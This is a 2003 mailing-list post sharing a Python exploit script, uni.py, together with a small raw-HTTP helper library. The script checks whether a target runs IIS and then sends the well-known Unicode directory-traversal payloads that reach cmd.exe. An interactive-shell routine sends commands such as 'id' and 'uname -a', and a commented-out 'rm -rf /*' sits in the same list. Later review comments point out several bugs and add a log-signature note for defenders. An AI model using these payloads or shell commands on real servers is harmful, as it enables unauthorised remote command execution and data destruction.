no standards for webapp exploitation
From: ned <nd () felinemenace org>
Date: Wed, 2 Jul 2003 00:21:25 -0700 (PDT)
----- uni.py
# i chose unicode because it is still the only
# good IIS exploit! oh and it does not work anymore
# tooo.
#this file incorporates a few modules from
# a teeny project of mine. and this is the (1/4)
# completed version of the web security module.
# there is no standard definition for web based exploits.
# VulnXML and the whisker.dat (and all of libwhisker
# (whisker RIP)) are for testing purposes ONLY. they
# do not scale to enterprise level where API's should
# be easy to work with and provide a high level
# interface to lower level scripting languages (like
# python, perl). variables should be extinct outside
# of module classes. the opensource web security community
# would benefit from a standardized way to exploit
# web applications, whether they are remote code execution,
# remote command execution, server and client injection,
# remote file reading (all of which are going to be covered
# in an independent project which seeks to build webapp
# exploit primitives provider on top of the websec class).
# feel free to send comments and code to me (nd () felinemenace org)
# - nd
#mwebsec
from net import *
#from utils import *
import sys
class websec:
    """Minimal raw-HTTP request/response helper built on the ``net`` section.

    State lives on the instance: ``host``/``port``/``creds`` identify the
    target, ``fds`` maps a ``creds`` key to its socket, ``reqbuf`` holds the
    outgoing request and ``tempdata`` caches the first 500 bytes of the reply
    split into lines.  ``self.socket`` is only assigned by ``get_sock``.
    ``debug``, ``setCredentials`` and ``makeTCPSocket`` are the functions
    defined further down this file (pulled in by ``from net import *``).
    """
    def __init__(self):
        self.tempdata = []   # cached reply lines; [] means "nothing read yet"
        self.port = 0
        self.host = ""
        self.fds = {}        # creds key -> socket
        self.creds = ""      # "host:port" key, built up by setHost/setPort
        self.reqbuf = ""     # raw request text accumulated by addreq
    # return code that is expected after request
    def expect_return_code(self,codes):
        """Return 1 if the reply's first line contains an expected code, else 0.

        ``codes`` is a single code ("200") or several joined by ":"
        ("200:302"); each is matched as a substring of the status line.
        The reply is read (at most 500 bytes, one recv) only when
        ``tempdata`` is empty; later calls reuse the cached lines until
        ``cleartemp`` is called.
        """
        found = 0
        c = []
        f = ""
        if self.tempdata == []:
            debug("websec: recieving data")
            # NOTE: a single recv() may return less than the full status line
            self.tempdata = self.socket.recv(500).split('\n')
        #debug(self.tempdata)
        if codes.find(":") != -1:
            c = codes.split(":")
            debug("websec: looking for %d different return codes" % len(c))
            for x in c:
                if self.tempdata[0].find(x) != -1:
                    f += x
                    found += 1
        else:
            if self.tempdata[0].find(codes) != -1:
                debug("websec: %s" % self.tempdata[0])
                f = codes
                found += 1
        if found == 0:
            debug("websec: did not find expected return code(s)")
            debug("websec: %s" % self.tempdata[0])
            return 0
        debug("websec: found return code - %s" % f)
        # return the array as a string
        return 1
    def expect_server(self,type):
        """Return 1 if a ``Server:`` header line contains ``type``, 0 if not.

        Scans the cached reply lines (reading them first if needed) for a
        line starting with "Server:" or "server:"; the first such line
        decides the result.  Falls through and returns None when the reply
        has no Server header at all.
        """
        found = 0
        if self.tempdata == []:
            self.tempdata = self.socket.recv(500).split('\n')
        for x in self.tempdata:
            if x.startswith("Server:") or x.startswith("server:"):
                if x.find(type) != -1:
                    debug("websec: found server type - %s" % type)
                    debug("websec: %s" % x)
                    return 1
                else:
                    # NOTE(review): indentation was lost in the archive; this
                    # else is assumed to pair with the find() test above
                    debug("websec: did not find server type - %s" % type)
                    return 0
    def setHost(self,host):
        """Record the target host and start the "host:" part of ``creds``."""
        self.host = host
        self.creds = host + ":"
    def setPort(self,port):
        """Record the port; it is appended to ``creds`` only if setHost ran first."""
        self.port = port
        if self.creds != "":
            self.creds += "%d" % port
    def connect(self):
        """Publish host/port to the ``net`` globals and open a TCP socket."""
        debug("connection...")
        setCredentials(self.host,self.port)
        self.get_sock()
    def get_sock(self):
        """Create the socket for ``creds`` and make it ``self.socket``.

        ``makeTCPSocket`` returns None when the connect fails, so
        ``self.socket`` can be None afterwards; ``sendreq``/``close`` then
        raise AttributeError rather than a connection error.
        """
        self.fds[self.creds] = makeTCPSocket()
        self.socket = self.fds[self.creds]
    def addreq(self,data):
        """Append ``data`` to the pending request buffer."""
        self.reqbuf += data
    def sendreq(self):
        """Send the buffered request on the current socket; the buffer is kept.

        Uses a single send(), which is not guaranteed to write the whole
        buffer.
        """
        debug("sending data!")
        self.socket.send(self.reqbuf)
    def cleartemp(self):
        """Drop the cached reply lines so the next expect_* call reads again."""
        self.tempdata = []
    def clearreq(self):
        """Empty the request buffer."""
        self.reqbuf = ""
    def close(self):
        """Close the current socket (its entry in ``fds`` is left in place)."""
        self.socket.close()
#mwebsec
#mnet
import socket
#from utils import *
import random
# pretty explanatory
def setCredentials(h,p):
    """Store target host ``h`` and port ``p`` in module globals and raise the ``set`` flag.

    The debug lines are emitted before ``set`` is assigned, so they only
    show up if the flag was already 1 (e.g. after ``debug_set``).
    """
    global set, host, port
    debug("net.py: host is %s" % h)
    debug("net.py: port is %d" % p)
    host, port = h, p
    set = 1
def return_set():
    """Return the module-level ``set`` flag (1 once setCredentials/debug_set has run).

    NOTE: the flag's name shadows the builtin ``set`` type in this module.
    """
    global set
    return set
def meep():
    """Emit the "use setCredentials first" diagnostic via ``debug``; returns None."""
    debug("net.py: use setCredentials First!")
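def makeTCPSocket():
    """Open a TCP connection to the module-global ``host``/``port``.

    Returns the connected socket, or None when ``setCredentials`` has not
    been called (``set != 1``) or the connect fails.  Unlike the original,
    a failed connect closes the half-built socket instead of leaking the
    descriptor, and no socket is created at all when the flag is unset.
    """
    if set != 1:
        meep()
        return None
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
    except socket.error:
        debug("net.py: Could not connect to %s on %d" % (host, port))
        s.close()  # don't leak the descriptor on a failed connect
        return None
    debug("net.py: tcp socket is ready for reading/writing")
    return s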
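def makeUDPSocket():
    """Create a UDP socket with the module-global ``host``/``port`` as default peer.

    Returns the socket, or None when ``setCredentials`` has not been called
    (``set != 1``) or connect() raises.  Fix: the original assigned the new
    socket to a local named ``socket``, shadowing the module and leaving
    ``s`` undefined.  Note that connect() on a datagram socket only records
    the peer address; it does not prove the host is reachable.
    """
    if set != 1:
        meep()
        return None
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect((host, port))
    except socket.error:
        debug("net.py: Could not connect to %s on %d" % (host, port))
        s.close()  # don't leak the descriptor
        return None
    debug("net.py: udp socket is ready for reading/writing")
    return s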
def interact(s):
    """Attach a Telnet session to an already-connected socket ``s``.

    Writes one entry of ``cmd`` and then hands the session to
    ``Telnet.interact``; returns 1 once that session ends.  As written this
    is not runnable: ``telnetlib`` is never imported in this file, and the
    ``random.randint[...]`` expression raises TypeError before anything is
    sent.  ``telnetlib`` is also deprecated (PEP 594) and removed in
    Python 3.13.
    """
    cmd = ["id","uname -a",#"rm -rf /*",
    "echo \"_|_ this!\""]
    shell = telnetlib.Telnet()
    shell.sock = s   # reuse the caller's socket instead of Telnet.open()
    # random stuff
    shell.write(cmd[random.randint[len(cmd) - 1]])
    shell.interact()
    return 1
#mnet
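def debug(data):
    """Print ``data`` when the module-level ``set`` flag is 1; otherwise stay silent.

    ``set`` is the same global that setCredentials/debug_set switch on, so
    diagnostics only appear after one of them has run.  Uses the
    parenthesised print form so the function works under Python 2 and 3.
    """
    if set == 1:
        print(data)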
def debug_set():
    """Turn on ``debug`` output by setting the module-level ``set`` flag to 1.

    This is the same flag makeTCPSocket/makeUDPSocket test, so calling
    debug_set also makes them behave as if setCredentials had run.
    """
    global set
    set = 1
# not a great example
if __name__ == '__main__':
    # Usage: uni.py <host>.  Fingerprints the server with a HEAD request,
    # then replays a short list of the classic IIS "Unicode" directory
    # traversal paths (overlong UTF-8 encodings of "/", e.g. %c0%af) and
    # treats any HTTP 200 as a hit.  Defender's note: these exact byte
    # sequences in web-server request logs are a reliable signature of this
    # probe.
    u = []
    debug_set()
    w = websec()
    w.setHost(sys.argv[1])
    w.setPort(80)
    w.connect()
    w.addreq("HEAD / HTTP/1.0\r\n\r\n")
    w.sendreq()
    if w.expect_server("IIS") != 1:
        debug("not IIS")
        sys.exit(0)
    w.close()
    w.clearreq()
    w.cleartemp()
    # stick this in your pipe and smoke it.
    u.append("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+")
    u.append("/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+")
    u.append("/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+")
    u.append("/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+")
    p = 0
    for x in u:
        p += 1
        debug("trying %d..." % p)
        # NOTE: the template is sent literally -- x is not interpolated --
        # and tempdata is never cleared inside the loop, so after the first
        # pass expect_return_code re-checks the cached reply.
        req = "GET %s HTTP/1.0\r\n\r\n"
        w.clearreq()
        w.addreq(req)
        w.connect()
        w.sendreq()
        if w.expect_return_code("200") == 1:
            # ``sys.arg`` and ``%h`` are typos; this line raises if reached
            debug("found unicode bug %d on %h" % sys.arg[1])
        w.close()
----- uni.py
--
http://felinemenace.org/~nd
